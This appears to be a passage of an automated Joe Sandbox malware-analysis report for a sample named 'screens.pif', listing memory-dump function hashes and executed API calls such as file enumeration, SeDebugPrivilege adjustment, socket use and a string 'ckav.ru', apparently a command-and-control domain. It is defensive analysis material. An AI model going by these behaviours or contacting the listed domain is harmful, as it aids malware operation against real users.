Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_abe0000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0498e23536b90c0454265bf9fd39e5d7f7a6e2f33e35f11c4496ab4e3b6e33b
Instruction ID: fe6082cc14360c519218f0e3b48a63a7e7a7a8775d4066c4f307f5991633b91e
Opcode Fuzzy Hash: f0498e23536b90c0454265bf9fd39e5d7f7a6e2f33e35f11c4496ab4e3b6e33b
Instruction Fuzzy Hash: 83A12A74E142199FDB14DFA9D580AAEFBF2FF89304F2481AAD409A7315D7309941DF60

Function 02D531E8 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a861d8881dda55fb4d08e81959c5127c62c66e25016bffce544fb32047d27291
Instruction ID: 8d2104699083f9578b72c2ebe451e10f51e6d5684e15442d6dd5180d8b9299cf
Opcode Fuzzy Hash: a861d8881dda55fb4d08e81959c5127c62c66e25016bffce544fb32047d27291
Instruction Fuzzy Hash: 34715674E0525ADFCB48CF99D480AAEFBB1FB89350F14D46AD916AB310C3749A81CF91

Function 0D06B620 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d060000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424ed7a9576aa944eb31232eabb9267f7d59d766f1a0a07a53b21ac1f87feadd
Instruction ID: 421a7a584e6a106649d27509d8b7dc3e13ff81ff438fd33194e1d6ebb2a0042a
Opcode Fuzzy Hash: 424ed7a9576aa944eb31232eabb9267f7d59d766f1a0a07a53b21ac1f87feadd
Instruction Fuzzy Hash: 5C71E4B0E15219CFDB04CFA9D5805DEFBF6FB88210F24D42AE519F7224D734AA428B64

Function 0D06A218 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d060000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16bd28e92c1c82090e1b3136a40b1ef24eba319843c705ecc1420b40d2feae9a
Instruction ID: 022af66520f32d343059b981f119dcbf421477d2e29f1e5c31c890d8a7146d75
Opcode Fuzzy Hash: 16bd28e92c1c82090e1b3136a40b1ef24eba319843c705ecc1420b40d2feae9a
Instruction Fuzzy Hash: 3871BD74E11219DFCB48CFA9D58499EFBF1FF89210F14C56AE819AB220D734AA41CF60

Function 0D060F08 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d060000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b040765bf12abbc757b1e77d3633de5707d94acd74010582572f130de6bfa6f
Instruction ID: b3fb0ace4a60d6ffa2b642ff8e15c95510b274e1138019ec4ef62937215fb447
Opcode Fuzzy Hash: 5b040765bf12abbc757b1e77d3633de5707d94acd74010582572f130de6bfa6f
Instruction Fuzzy Hash: 2C61D174E1424ADFDB04CFAAD4809AEFBB5FF88310F14851AD419A7214D334E982CFA5

Function 0D0611F3 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d060000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba06605039f8fd71588d092f3d194c41cae102c10ef9b670cc5199eb2c135a7e
Instruction ID: b5be134b3e48c7538d72386baaf806974c52d3f43ba97cd3af02a42b022730b6
Opcode Fuzzy Hash: ba06605039f8fd71588d092f3d194c41cae102c10ef9b670cc5199eb2c135a7e
Instruction Fuzzy Hash: 8A5109B4E0421A9BDB04CFAAD4816EEFBF6FF44300F14C56AD519AB204D73896518FA5

Function 02D56218 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b3a2c9fb7d5323e9822b15aa310452da7f23e7c0c1f2a469f8582e02dae3668
Instruction ID: 06b9c3e92145b09d750e19c19ca9bc11309499ce333b354637017567bfe718b7
Opcode Fuzzy Hash: 6b3a2c9fb7d5323e9822b15aa310452da7f23e7c0c1f2a469f8582e02dae3668
Instruction Fuzzy Hash: D0510374E05229DFCB44CF99DA809AEFBF6BB88210F548566E815A7314D370ED41CBA4

Function 02D564F1 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49be6615512cdd4c1ea4cd34fab2199076ba313a5f80531220cb2ca4a446b323
Instruction ID: c17b8f063a1f3486fc6ec5de3f0fd5f31592fe2cd1e47a9d961cf5ea861dff27
Opcode Fuzzy Hash: 49be6615512cdd4c1ea4cd34fab2199076ba313a5f80531220cb2ca4a446b323
Instruction Fuzzy Hash: AD51F6B0D042699FCF04CFA9D880AEEBBF6BF48200F54816AD955A7344D7749A51CF94

Function 0D0619C8 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d060000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73d430f9749055f826bc32f383a188ee6e172af2598534eb4b92e758ba821a74
Instruction ID: a37adf0246c56220f34d16f3d0b8f9805cb11df4e45320144f42bcbd9301d1e9
Opcode Fuzzy Hash: 73d430f9749055f826bc32f383a188ee6e172af2598534eb4b92e758ba821a74
Instruction Fuzzy Hash: 825105B0E1520A9FDB04CFA9C5815EEFBF6BF89300F24D56AD409B7214E7349B418BA5

Function 0D0619D8 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d060000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f24a3d53bb691185f13a8813a1787a1abf26ab2da4e5a3df72118d598c51d11d
Instruction ID: 7111833b631ebe1644854f378e6441269302851a6c6239d1263adad0545e6711
Opcode Fuzzy Hash: f24a3d53bb691185f13a8813a1787a1abf26ab2da4e5a3df72118d598c51d11d
Instruction Fuzzy Hash: 995105B0E1520ADFDB04CFA9C5815EEFBF6BB89310F24D16AD409B7214E7349B418BA5

Function 0ABE1FB8 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_abe0000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 878bb566939d909c46102833043f18daba711f1eac0ae0b6dad2b940cdd3c4c1
Instruction ID: fd254d445a0675a179f081035705077cdee05a6c450317789f9422e8832cf668
Opcode Fuzzy Hash: 878bb566939d909c46102833043f18daba711f1eac0ae0b6dad2b940cdd3c4c1
Instruction Fuzzy Hash: 2E416670E112189FDB58CFA9D985BDEFBF6BF88200F1480AAD908A7355D7309982CF51

Function 02D56D48 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd306953e3e4de1e1be07ea8ec0e695d41d8c054ea4e4bf86140b240a3dbb074
Instruction ID: a1c9929cd6ec6aae39d1cd967cdc55b44128dbdc147219cef5faf73a8ddf6b03
Opcode Fuzzy Hash: dd306953e3e4de1e1be07ea8ec0e695d41d8c054ea4e4bf86140b240a3dbb074
Instruction Fuzzy Hash: 87411AB4E0521A8BCF44CFAAC5815AEFBF2BF88300F64C56AD805A7314D7749A41CB94

Function 02D56D58 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb8da70990cff89fba8e768d9c22c3b1a7e3541c74b64c39237b2ffeaa93af1e
Instruction ID: b0e2ed61cf765af7d7f82fd31a85463955ea64ff8c7a8493b24e59fef54a4f02
Opcode Fuzzy Hash: eb8da70990cff89fba8e768d9c22c3b1a7e3541c74b64c39237b2ffeaa93af1e
Instruction Fuzzy Hash: 544108B0E0561ACBCF44CFAAC5805AEFBF6FB88300F64C56AD905AB314D7749A41CB94

Function 0D06B8B8 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d060000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d970c11d68ce5f0a34ff52b13b47b5ae81fef7108d7a53bea89a3ee9c0de5241
Instruction ID: 41279025d4b9ae1a1d643a5fd2490b4d213ae5c16643475bc579a8bf76f3342b
Opcode Fuzzy Hash: d970c11d68ce5f0a34ff52b13b47b5ae81fef7108d7a53bea89a3ee9c0de5241
Instruction Fuzzy Hash: 4941FAB0E0561ADBDB44CFAAD5415AEFBF6FF88200F24C06AC519F7218D7749A418BA4

Function 02D56870 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74eb49ceebbe3e1a0b82456ff9ce37da05e79eb89aa82f9d2807a1e4c7a19522
Instruction ID: 06c98613645f2678cc79987cf429f182fbbf91c7f242b4f1e3c4bafb0016808a
Opcode Fuzzy Hash: 74eb49ceebbe3e1a0b82456ff9ce37da05e79eb89aa82f9d2807a1e4c7a19522
Instruction Fuzzy Hash: 9541E470D0461A9FDF48CFAAC4415AEFBF6BB88300F50C42AC855A7354E7789A428F94

Function 02D56863 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb3f5b46452ee5a5c122bc12e2787759cd8c0d83250e9f2298020a4eec44816e
Instruction ID: 092fc8911fbc539eca91df0e3fd38c1e1cb9257c5283f205eacb1d84594ff910
Opcode Fuzzy Hash: fb3f5b46452ee5a5c122bc12e2787759cd8c0d83250e9f2298020a4eec44816e
Instruction Fuzzy Hash: 1641F670E0461A9FDF48CFAAC4815AEFBF6BB88300F54C42AC855A7354E7789A41CF94

Function 0ABE1FC8 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_abe0000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 388746546ab2411dc7cb87a0ed9ec65a0adb56b2d9d79b64a3d724b0a405ac5f
Instruction ID: 1694bbd2ae847ac03114481e693c9f2a9039f5d088ea1bcc3ee6c8fe93862ef4
Opcode Fuzzy Hash: 388746546ab2411dc7cb87a0ed9ec65a0adb56b2d9d79b64a3d724b0a405ac5f
Instruction Fuzzy Hash: A8412A70E112189FDB58CF66D945B9EFBF6BF88200F14C0AAD508A7355DB709A81CF51

Function 0AEA0040 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_aea0000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ba52e316db52f7c18de1b7aee63860d8b80b55c8aec94a8694dfb1eee48098c
Instruction ID: 4bf876aa46b391de7d272bd67f2f9fca6c9abeac1c51f2c4e832655c4dad4498
Opcode Fuzzy Hash: 6ba52e316db52f7c18de1b7aee63860d8b80b55c8aec94a8694dfb1eee48098c
Instruction Fuzzy Hash: 45313B71E046289BDB68CF6ADD406DAF7B7BBD9300F44D1BA850CEB214DA305A859F00

Function 0ABEBC27 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_abe0000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d567b7e2c7f973306811c42b74d8d07c65d9b797c63f9d38d021a0f8db6afb63
Instruction ID: b8cd05b122449a96ee581b4b9d3ca77f044eb32e42fd51c8f33a374c3dc864cd
Opcode Fuzzy Hash: d567b7e2c7f973306811c42b74d8d07c65d9b797c63f9d38d021a0f8db6afb63
Instruction Fuzzy Hash: ED31D771E046189BDB68CF2AD8407DABBB7BBC9300F14C0FA940DA7214DB315A959F50

Function 0AEA0025 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_aea0000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc74d095f46f50d4b36b241e27a4b82e33335a086ed0a056f590457f1d2252a7
Instruction ID: dc7010d28b756ca540bebb50d39d446175238a710faffffef5b5a488fc94f62f
Opcode Fuzzy Hash: fc74d095f46f50d4b36b241e27a4b82e33335a086ed0a056f590457f1d2252a7
Instruction Fuzzy Hash: AB213D71E047549FD769CF668C546DABBB3AFD6310F09C4FA8448AB215EA340D86CF10

Function 0D06F218 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d060000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 940f0cc42959a9aaf2911f073b8186df24da4980a02b0dc47e0cfb2fcb9a1fd1
Instruction ID: 7435441c4daeed61358e761b5ba478d460081c811e09a8d1ea50bed80b8d72f1
Opcode Fuzzy Hash: 940f0cc42959a9aaf2911f073b8186df24da4980a02b0dc47e0cfb2fcb9a1fd1
Instruction Fuzzy Hash: F1111771E106199BEB48CFAAE9406DEFBF7BFC8200F14C07AD408A7214EB345A018F91

Analysis Process: screens.pifPID: 688, Parent PID: 2208COMMON

Execution Graph

Execution Coverage:	31.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.5%
Total number of Nodes:	1833
Total number of Limit Nodes:	93

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

Program Files, xrefs: 00403E01
Windows, xrefs: 00403DEA
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
%s\*, xrefs: 00403D99

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: 1dae284ec7aa54d6a8d1213654802f17282482a61951f49c161b5c3b2de02155
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 1dae284ec7aa54d6a8d1213654802f17282482a61951f49c161b5c3b2de02155
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 8b3f5aaad329952e7ceb99c6b490e01b4fa6f2d39085f40df109be46110acc21
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 8b3f5aaad329952e7ceb99c6b490e01b4fa6f2d39085f40df109be46110acc21
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_screens.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

